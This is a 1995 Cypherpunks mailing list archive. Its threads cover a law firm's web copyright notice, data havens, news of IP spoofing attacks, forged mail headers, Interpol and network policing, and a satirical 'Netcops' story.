Message-ID: <199501230555.VAA06569@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Someone on the Cyberia mailing list has announced that his URL on
legal matters (http://www.commlaw.com/pepper) can only be accessed by
sites which charge a "flat rate." I'm not at all clear what he means
by a flat rate here....is is flat rate per month, or per access, or
what?

In any case, I sent him (and the Cyberia list) a note saying I had
already added it to my home page and that the nature of the Web is
that URLs ripple out, either by linking with other pages or by
publicizing the URLs (as he did, and as I have just done here).

So, give it a browse and add it if you find it interesting. When he
sees a bunch of accesses (assuming his system has logs he can look at)
from sites over which he cannot possibly hope to set policy for, he
may realize the futility of this.

(He can stop accesses, or charge admission, with various means--maybe
not yet fully developed, or with commercial Web servers such as
Netscape is developing--but he cannot release the URL and then enforce
his ideas of who can access it. God forbid we have people trying to
"copyright" their URLs and then collect royalites anytime the URL
shows up in someone's list of interesting places.)

This experiment in guerilla ontology brought to you by,

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sun, 22 Jan 95 19:06:55 PST
To: cypherpunks@toad.com
Subject: Re: T.A.Z. on Disk
Message-ID: <ab48ce040102100494fc@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


>On Fri, 20 Jan 1995, Angus Patterson wrote:
>>
>> > I also saw another e-book site that had some more of [Bey's] stuff, can't
>> > remember what it was though.
>
>On Fri, 20 Jan 1995, Mark Grant wrote:
>> There's some more on the WWW at http://www.uio.no/~mwatz/bey/index.html.
>
>Bey sings the line that good is no different from evil, feeling
>is better than thinking, and truth indistinguishable from lies.
>
>Sounds like a pile of crap to me.  Still,  I suppose that feelings
>and lies are a poets job.

Hm. Can we maybe head off the Ideology War before it becomes unstoppable?
Cypherpunks write code, and do lots of other stuff too, but I'm hoping that
endless political wars is something cypherpunks don't do, or at least try
not to do on the cypherpunks list.

[It's possible that the ideology of the list is as homogenously
anarcho-capitalist as it seems, but I'd bet there's enough anarcho-others
to sustain several never-ending political 'discussions' of the sort that
will make the list even less useful then when we spent dozens of messages a
day talking about logos.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 22 Jan 95 22:34:05 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: A Legal Web Page Issue
Message-ID: <v01510109ab48fd6442d9@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:55 PM 1/22/95, Timothy C. May wrote:
>Someone on the Cyberia mailing list has announced that his URL on
>legal matters (http://www.commlaw.com/pepper) can only be accessed by
>sites which charge a "flat rate." I'm not at all clear what he means
>by a flat rate here....is is flat rate per month, or per access, or
>what?
[...]
>So, give it a browse and add it if you find it interesting. When he
>sees a bunch of accesses (assuming his system has logs he can look at)
>from sites over which he cannot possibly hope to set policy for, he
>may realize the futility of this.
>
>(He can stop accesses, or charge admission, with various means--maybe
>not yet fully developed, or with commercial Web servers such as
>Netscape is developing--but he cannot release the URL and then enforce
>his ideas of who can access it. God forbid we have people trying to
>"copyright" their URLs and then collect royalites anytime the URL
>shows up in someone's list of interesting places.)

What a crazy thought. I will make sure to access his URL early and often.

BTW, what is your homepage URL? Or was that just a spoof?


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Sun, 22 Jan 95 22:39:58 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: www.commlaw.com/pepper page
Message-ID: <Pine.HPP.3.91.950122223214.27990A-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain


<p>
Copyright 1994 by Pepper & Corazzini, L.L.P.  All rights reserved.
Reproduction is permitted so long as no charge is made for copies, no copies
are placed on any electronic online service or database for which there is a
fee other than a flat access charge, there is no alteration and this
copyright notice is included.
<p>

legal translation:
don't charge money to access this or copies of this page 
UNLESS you charge for internet access and EVEN then, don't charge
extra just to look at this page.

didn't want to bring this to the list unless it's to kill this discussion
someone misread it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david.lloyd-jones@canrem.com (David Lloyd-Jones)
Date: Sun, 22 Jan 95 20:31:05 PST
To: cypherpunks@toad.com
Subject: LOCKSMITH'S GUILD WANTS L
In-Reply-To: <199501211859.KAA12413@netcom7.netcom.com>
Message-ID: <60.19259.6525.0C1CB25E@canrem.com>
MIME-Version: 1.0
Content-Type: text/plain


 tcmay@netcom.com (Timothy C. May) sez:
 
TM+Crypto and remailers are going to do the same thing to today's
  +versions of guilds, what we call "licensed professions."
 
I've got PGP, therefore I can be a brain surgeon?  Well, yeah, OK.  
Pediatrician?  Hmmm.  'Nuther bad example.   Proctologist?  Sure.
How 'bout dentist?
 
There's got to be one or two licensed professions you're not thinking 
of...
 
                          -dlj.

david.lloyd-jones@canrem.com

 * 1st 1.11 #3818 * Aibohphobia: irrational fear of palindromes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sun, 22 Jan 95 20:23:53 PST
To: cypherpunks@toad.com
Subject: Re: port 25 forgeries
Message-ID: <9501230415.AA11561@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:35 PM 1/21/95 PST, santa@northpole.toad.com, org@toad.com wrote:
> ... 
>Received: from relay2.UU.NET by eri.erinet.com (4.1/SMI-4.1.1)
>	id AA16848; Sun, 22 Jan 95 02:56:29 EST
>Received: from toad.com by relay2.UU.NET with SMTP 
>	id QQxztg01780; Sun, 22 Jan 1995 03:01:32 -0500
>Received: by toad.com id AA23166; Sat, 21 Jan 95 23:55:03 PST
>Received: from northpole.org (tower.stc.housing.washington.edu) by toad.com 
id AA22783; Sat, 21 Jan 95 23:36:47 PST
> ...

Presumeably the (tower.stc.housing.washington.edu) comes from a PTR DNS 
lookup. What happens if the IP address of the remailer isn't available from 
DNS, or the in-addr.arpa entry is wrong?  (I don't know who exactly is 
responsible for the in-addr.arpa entry--is it the same as for the others?)

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sun, 22 Jan 95 20:24:04 PST
To: John Young <cypherpunks@toad.com
Subject: Re: Locksmith's Guild wants limit on free speech
Message-ID: <9501230415.AB11561@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:42 PM 1/22/95 -0500, John Young wrote:
> ...  
>Both fear that they do not know the code well enough to take the risk of
>being found at fault by random municipal inspections of construction. 
>A-E's dread the liability and blame by owners for well-known construction
>corner-cutting, and owners suspect their professionals competency and
>ethics -- afraid that the pros will certify in ignorance or cupidity and
>that the owners will face costly corrections without having the traditional
>scapegoat of over-weening government to justify cheating in the field. 

A classic example of people being unwilling to accept responsibility for the 
outcome of their own actions.  That said, building inspection serve much the 
same function as code reviews, and are a "good thing" for exactly the same 
reason.  I suspect that the A-E's will lobby for liability exemptions, and 
if they fail to get them, they will wind up going to private building 
inspectors/"code consultants" just like in-house accountants bring in 
outside auditors.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sun, 22 Jan 95 20:24:50 PST
To: Jonathan Cooper <entropy@IntNet.net>
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Pine.SV4.3.91.950118141828.7755B-100000@xcalibur>
Message-ID: <Pine.SUN.3.91.950122232148.24135H-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Jan 1995, Jonathan Cooper wrote:

> > 	I could write a procmail recipe and a script in about an hour to
> > automatically secret-share-split and redistribute the incoming submission.
> 
>    I'll wager most of us could.  Question: whom would you redistribute it 
> _TO_?  This seems to be the stumbling block - who is willing to store the 
> data on their machine or net account?

	Why, other data haven operators, of course.

	[ Insert 500 messages about anonymous payment systems, 
FirstVirtual vs DigiCash, remailers, "data haven" guilds, etc. ]

[ ... ]
>    How would you handle retrieval of the data?  

	Details, details. Just off the top of my head: an encrypted 
database that logs where the pieces were split and sent to. When the 
original data haven recieves a request for the file, it sends out 
requests to the other data havens, and reassembles the file, and shoots 
it out again to the original owner.

Michael
---
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 22 Jan 95 23:55:04 PST
To: shamrock@netcom.com (Lucky Green)
Subject: Re: A Legal Web Page Issue
In-Reply-To: <v01510109ab48fd6442d9@[192.0.2.1]>
Message-ID: <199501230753.XAA17662@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:

> What a crazy thought. I will make sure to access his URL early and often.
> 
> BTW, what is your homepage URL? Or was that just a spoof?

Not a spoof, but not necessarily a normal home page. What I call my
home page is my "lynx" page, "lynx_bookmarks.html", to which I add
whatever URLs look interesting. (Netcom currently does not support WWW
pages for outside access.)

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 23 Jan 95 00:05:36 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: A Legal Web Page Issue
Message-ID: <v0151010dab4913235de9@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 PM 1/22/95, Timothy C. May wrote:
>Lucky Green wrote:
>
>> What a crazy thought. I will make sure to access his URL early and often.
>>
>> BTW, what is your homepage URL? Or was that just a spoof?
>
>Not a spoof, but not necessarily a normal home page. What I call my
>home page is my "lynx" page, "lynx_bookmarks.html", to which I add
>whatever URLs look interesting. (Netcom currently does not support WWW
>pages for outside access.)

I see. I thought that perhaps you had one of those ftp://* homepages that
people here at Netcom seem to set up more and more.


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 23 Jan 95 00:15:41 PST
To: Dave Horsfall <dave@esi.COM.AU>
Subject: Re: Anti-porn conference in Manila
In-Reply-To: <Pine.SUN.3.91.950123170842.21383B-100000@eram.esi.com.au>
Message-ID: <Pine.3.89.9501222311.A9801-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Jan 1995, Dave Horsfall wrote:

> Date: Mon, 23 Jan 1995 17:11:20 +1100 (EST)
> From: Dave Horsfall <dave@esi.COM.AU>
> To: cypherpunks@toad.com
> Subject: Re: Anti-porn conference in Manila
> 
> On Sun, 22 Jan 1995, James A. Donald wrote:
> 
> > Both Australia and England have government established
> > religions, so I expect there was a major turn out from
> > those two nations.
> 
> An extract from the Australian Constitution:
> 
> 116. The Commonwealth shall not make any law for establishing any
> religion, or for imposing any religious observance, or for prohibiting the
> free exercise of any religion, and no religious test shall be required as
> a qualification for any office or public trust under the Commonwealth. 
> 
> Do please explain.

Church of England in Australia was, and I believe still is, government 
funded by the Australian government.

Furthermore when my kids went to government school in NSW, Australia,
they were taught Church of England religion by my neighbor, Mrs Law, 
in school, in the classroom.  

If it quacks like a duck ...

I was unaware of the portion of the constitution that you mention.

I suspect that the government and the church are none to clear on it
either.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 23 Jan 95 00:12:30 PST
To: cypherpunks@toad.com
Subject: Re: A Legal Web Page Issue
In-Reply-To: <199501230643.BAA29346@ducie.cs.umass.edu>
Message-ID: <199501230811.AAA19566@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


L. McCarthy wrote:

> The text of the actual copyright notice seems to have a much friendlier slant.
> It resembles a GNU or FSF-type freeware license. Apparently you're just not
> allowed to charge *more* than a flat fee:
> 
> - From the bottom of the cited Web page:
> "Copyright 1994 by Pepper & Corazzini, L.L.P. All rights reserved. 
> Reproduction is permitted so long as no charge is made for copies, no copies
> are placed on any electronic online service or database for which there is a
> fee other than a flat access charge, there is no alteration and this 
> copyright notice is included."

He (Friedman, on the Cyberia list) mentioned that they found
some site that was charging an unacceptable (nonflat?) rate, and sent
them a letter asking for a fee to be paid.

This is what I'm really getting at, the notion of placing material on
a publically-accessible ftp or Web site and then claiming that
additional rules apply. To put it more clearly, it's a bit like me
posting my phone number and then attaching a claim that anyone may
call me provided they are not a member of, say, a corporation.

Or suppose I attach a "legal notice" in my sig someplace, saying that
while anyone may be able to send mail to me, law firms are required to
pay me $100 every time they send me a message. An unenforceable rule.
(In anarcho-capitalist terms, a la "Snow Crash," I could _try_ to
enforce this, by hiring my own collection agencies, but even Uncle
Enzio's Protection Racket, Inc. would likely scoff at such an attempt.)

A Web site that wishes to impose fees or set rules should do so with
_technological_ methods, not invoke the creaky old copyright system
and bring in the judicial system to enforce a basically unenforceable
policy. Note that Netscape's "Web server" product is basically this
technological approach, wherein Web sites that wish to set access
policies and perhaps charge for access are able to.


And enforcement is tough, in any case.

Since their page can of course be accessed from Russia or Burma or
Upper Ruritania, how can their "no non-flat fees" policy be applied to
all accesses except by charging admission at the gates, themselves?

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 23 Jan 95 00:33:42 PST
To: shamrock@netcom.com (Lucky Green)
Subject: Re: A Legal Web Page Issue
In-Reply-To: <v0151010dab4913235de9@[192.0.2.1]>
Message-ID: <199501230832.AAA22500@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:

...
> >Not a spoof, but not necessarily a normal home page. What I call my
> >home page is my "lynx" page, "lynx_bookmarks.html", to which I add
> >whatever URLs look interesting. (Netcom currently does not support WWW
> >pages for outside access.)
> 
> I see. I thought that perhaps you had one of those ftp://* homepages that
> people here at Netcom seem to set up more and more.

I've never looked into doing this. I've placed a copy of my
lynx_bookmarks.html in my ftp directory at Netcom, full pathname of
/ftp/pub/tc/tcmay/lynx_bookmarks.html, so if anyone knows what
combination of incantations involving http:, www, netcom, ftp, etc. to
include, you can access it. (It's chmod 755, so your can read and
execute.)

(If it works, share it with at least me.)

--Tim May



-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 22 Jan 95 11:41:00 PST
To: cypherpunks@toad.com
Subject: Anti-porn conference in Manila
Message-ID: <gate.gV0cZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



The Religious Alliance Against Pornography has been holding a biggish 
conference in Manila; the focus is on child pornography, and a major topic
of discussion is the evil of electronic networks. The Interpol is among those
participating; the head of their kiddie-porn division claims Britain is the
source of most European stuff, and bemoans the fact that too little is spent
on monitoring traffic, as the war against drugs is considered more important.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Sun, 22 Jan 95 22:57:13 PST
To: cypherpunks@toad.com
Subject: Re: "Internetpol"
Message-ID: <Pine.3.89.9501222356.A14639-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



Netcops 
By Hank, reprinted with permission
<hank@vm.tau.ac.il>

I eased the unmarked cruiser onto the highway, its 424 cubic cc, VJ 
engine purring. Traffic was heavy that day, as convoys of Usenet 
semi-trailers barrelled their way down the Information Super Highway. 
Biker gangs using Crack steered clear of our sedan searching instead for 
Internet tourists in Bermuda shorts and Nikon cameras around their necks.

"Unit 7, Unit 7. Woman reporting a 426, over," came the printout on the
Netcops  IRC channel.

Friday turned to me and gave me that look. The look that he gets when he 
wants to tear somone's head off. Friday is 6'6" and 230 pounds. he enjoys 
inflicting pain when necessary. "It's guys like this who give the 
Internet a bad name. Let's go see what we can do to help," said Friday, 
as he placed the flashing blue Kojak on top of the sedan as I popped the 
car into 5th and slashed by the Usenet truckers hauling their load of 
pornographic magazines and political soapboxes.

We arrived at the Holiday Inn where the lady was staying. Her eyes were 
red and she looked like a Mac had hit her. Under the hurt she was 
actually quite pleasant to look at., kind of like the girl next door. Her 
name was Mary and in between sobs we sat her down and ordered espresso 
from the lounge bar. "It was terrible. I feel so violated. I'd like to
kill the bastard," spat Mary with a vehemence that only Friday could 
understand.

"Just the facts, mam," said Friday.

"I'm here overseas for 9 weeks on assignment for my company. My husband 
is back home with our daughter and we decided to stay in contact via the 
Internet. I carry my subnotebook with me everytime I travel. My husband 
and I get along great but 9 weeks away from each other is just too long 
so we engage in cyber-sex. You know, private IRC channel, getting 
undressed behind locked doors and describing in intimate detail what wee 
are doing to each other. We've been doing it almost daily for 3 weeks,".

"But this last time was different. My husband asked me to do all sorts of 
weird and kinky things and I agreed, but it just seemed wrong. After our 
three hour session, my husband called later that day saying that his 
Internet system was under ICMP redirect attack and that he hasn't been 
able to get Internet access for the past 24 hours,".

Friday cut her off, "Do you use any protection?".

"I normally would have used PGP (Pretty Good Privacy), but I forgot to 
install it before I left home. Listen, this guy at the other end must 
have been listening in on my previous sessions with my husband because
he knew all the right things to say as to not arouse my suspicions,".
Her lip trembled as she tried to hold back her tears but both Friday and 
myself knew time may heal all wounds but the scars remain.

It was now my turn to bring down the hard facts, "Mary it looks like you 
are the victim of a 426 --net-rape. There are no laws on the Internet, no 
police, no government to turn to. Friday and myself act as volunteers in 
this neck of the woods, along with thousands of others throughout the 
world who mete out our form of frontier justice. What would you like done 
once we catch the perp?".

She didn't hesitate for a moment, "I want nine of his fingers broken,".

"Why nine," I asked.

"There's no greater torture than using the Internet with one finger,".

Friday smiled. Mary had made herself a lifetime fan.

EPILOGUE

We were able to track down the perp via the historical data sampling we 
collect daily via our RMON probe. We just correllated the packets with 
Mary's known IP address and the time of day that the incident happened.
Once we had the perps IP address we contacted our fellow "cowboys" in 
that area who worked with the sysadmin who backtracked through the Unix 
logs and found the guy.

Needless to say, he will never type fast again.

------
The story you have read is true (giggle) the names ahve been changed
to protect the guilty.
------

This article appeared in Vol3 No2 Internet Society Magazine, 1994.

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Sun, 22 Jan 95 22:18:02 PST
To: cypherpunks@toad.com
Subject: Markoff/NYT on IP spoofing
Message-ID: <9501230617.AA20253@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


John Markoff writes in Monday's New York Times about a rash of computer
security breaches using IP spoofing to penetrate routers and firewalls.
That's all the technical info I coudld glean from the story; CERT is
supposed to "make an announcement" later today and tell us what brands
of routers can and cannot be modified to defend against this type of
attack. 

Towards the end of the article Markoff puts in a nice plug for crypto:

      Most computer security experts say that real security on the
   Internet awaits the widespread adoption of encryption technology
   for scrambling data and authenticating messages.
      ``The right answer is encryption because when you encrypt your
   business data you don't care how many people get a copy,'' said
   Eric Schmidt, the chief technical officer of Sun Microsystems. ``My
   prediction is that this will be the only real solution to these
   problems.''

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Sun, 22 Jan 95 22:42:27 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A Legal Web Page Issue
In-Reply-To: <199501230555.VAA06569@netcom15.netcom.com>
Message-ID: <199501230643.BAA29346@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May writes:
> Someone on the Cyberia mailing list has announced that his URL on
> legal matters (http://www.commlaw.com/pepper) can only be accessed by
> sites which charge a "flat rate." I'm not at all clear what he means
> by a flat rate here....is is flat rate per month, or per access, or
> what?
[...]
> So, give it a browse and add it if you find it interesting. When he
> sees a bunch of accesses (assuming his system has logs he can look at)
> from sites over which he cannot possibly hope to set policy for, he
> may realize the futility of this.

The text of the actual copyright notice seems to have a much friendlier slant.
It resembles a GNU or FSF-type freeware license. Apparently you're just not
allowed to charge *more* than a flat fee:

- From the bottom of the cited Web page:
"Copyright 1994 by Pepper & Corazzini, L.L.P. All rights reserved. 
Reproduction is permitted so long as no charge is made for copies, no copies
are placed on any electronic online service or database for which there is a
fee other than a flat access charge, there is no alteration and this 
copyright notice is included."

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyNP/2f7YYibNzjpAQHRWwP/YWLgxcrc2PH/J+X8fRLAv4/0GHie6nHK
kM5g0Qmbn7jp352aUmAlOQFgudgLSgx/cQeGKcHU9K6gDRjEYAPQc23PB6pWLL1Y
l8SBfvtJ5ttykIKrMSEFN+XfMfU/aT9Kl6e6EhIluWAEA4KCalGMDQ5h3eQ4VHCl
EHGjwZCE7KM=
=pDG/
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in (Rishab Aiyer Ghosh)
Date: Sun, 22 Jan 95 13:58:47 PST
To: cypherpunks@toad.com
Subject: Re: "Internetpol"
In-Reply-To: <199501222022.MAA14828@netcom7.netcom.com>
Message-ID: <o9yH1c1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@netcom.com (Timothy C. May) writes:

> rishab@dxm.ernet.in wrote:
> > The Religious Alliance Against Pornography has been holding a biggish 
> > conference in Manila; the focus is on child pornography, and a major topic
> > of discussion is the evil of electronic networks. The Interpol is among tho
> 
> Perhaps it will become "Internetpol"?

The Interpol, like many national police agencies, already does attempt to
police the Net. While their work against narcotics and money launderers deals
primarily with the phone network, _child_ pornography (which is legal in
places, but like all porn is illegal if non-consensual, as is usually the
case with kidporn), software piracy, and conspiracy/terrorism is hunted for
in cyberspace. For instance, there was this noise a while ago when they
stumbled on a xenophobic European BBS that had a hit-list of 'black' 
sympathizers. Naturally they aren't particularly good at net.policing, and
no one can ever really be.


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Mon, 23 Jan 95 03:34:22 PST
To: grendel@netaxs.com (Michael Handler)
Subject: Re: Call Security (Was: Re: TJOAUC 1-7)
In-Reply-To: <Pine.SUN.3.91.950122195349.24135E-100000@unix3.netaxs.com>
Message-ID: <199501231133.DAA14851@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> >  Call Security / Voice Crypto FAQ                     Neil Johnson
> 
> 	This guy showed up in sci.crypt back in November of '94, with the 
> "Call Security" program. It had some new unknown public-key algorithm in 
> it that he had designed himself.

    I recall the event in sci.crypt, though not the names involved.
    The article in TJOAUC is a "FAQ" by someone named Neil Johnson
    (njj@pokey.mc.com) who thanks David Colston and Charlie Merritt
    "the authors" for sharing info...

    The FAQ states boldly:
    "CS uses QPK Quick Public Keys by David Colston.  This public
    key system has been reviewed by Whit Diffie, Gus Simmons (Sandia
    Labs), and posted on sci.crypt."

    and on the next page:
    "8. Is it really secure? You, decide!

    Well, the public keys system used by Call Security, QPK
    (Quick Public Keys) by Dave Colston has survived peer review.
    This is good"

    Are these statements false?  Should someone call for a retraction?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wfgodot@iquest.com (Michael Pierson)
Date: Mon, 23 Jan 95 03:44:07 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: A Legal Web Page Issue
In-Reply-To: <199501230832.AAA22500@netcom11.netcom.com>
Message-ID: <6Hv8lu1u6tu3078yn@iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:
 
> I've never looked into doing this. I've placed a copy of my
> lynx_bookmarks.html in my ftp directory at Netcom, full pathname of
> /ftp/pub/tc/tcmay/lynx_bookmarks.html, so if anyone knows what
> combination of incantations involving http:, www, netcom, ftp, etc. to
> include, you can access it. (It's chmod 755, so your can read and
> execute.)
> 
> (If it works, share it with at least me.)


It was plug-and-play with my lynx.


-Michael





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Mon, 23 Jan 95 02:38:09 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: A Legal Web Page Issue
In-Reply-To: <199501230832.AAA22500@netcom11.netcom.com>
Message-ID: <Pine.SUN.3.91.950123053507.18529B-100000@unix2.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Jan 1995, Timothy C. May wrote:

> I've never looked into doing this. I've placed a copy of my
> lynx_bookmarks.html in my ftp directory at Netcom, full pathname of
> /ftp/pub/tc/tcmay/lynx_bookmarks.html, so if anyone knows what
[ ... ]
> (If it works, share it with at least me.)

	ftp://ftp.netcom.com/pub/tc/tcmay/lynx_bookmarks.html

	It works, I just tested it. However, the successful use of this 
predicates upon being able to log into Netcom's FTP server. "Busy" is an 
understatement for this machine.

	Now, about that LaTex JPEG II HyperMIME player...

Michael
--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: davidm@iconz.co.nz (David Murray)
Date: Sun, 22 Jan 95 09:39:17 PST
To: cypherpunks@toad.com
Subject: Re: Why emoney? Why not a web of debt?
Message-ID: <199501221738.GAA10275@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


>To: Censored Girls Anonymous <carolb@barton.spring.com>
>From: davidm@iconz.co.nz (David Murray)
>Subject: Re: Why emoney? Why not a web of debt?
>Cc: 
>Bcc: 
>X-Attachments: 
>
>>Many companies are already founded on "a web of debt".
>>"Sallie Mae (Student Loans), Ginnie Mae (General Loans), and Freddie Mac
>>(Real Estate Loans)," all come to mind at the moment. They're nicely
>>formatted, processed and make even more money for investors as the
>>interest rates change.
>
>Of course the ultimate IOUs these webs of debt are (implicitly, if not
>explicitly) based on are those of the American taxpayer -- which means
>Uncle Sam is playing collection agency, which the usual supporting cast
>of guns and goons.
>
>>So maybe the remailer IOU's, could be traded for the data haven IOU's,
>>and so forth. I think someone does have a credit card IOU situation.
>>The systems, and precedence for debt trading are there (and interest
>>rates are going up again soon, indicated the Fed last week!).
>
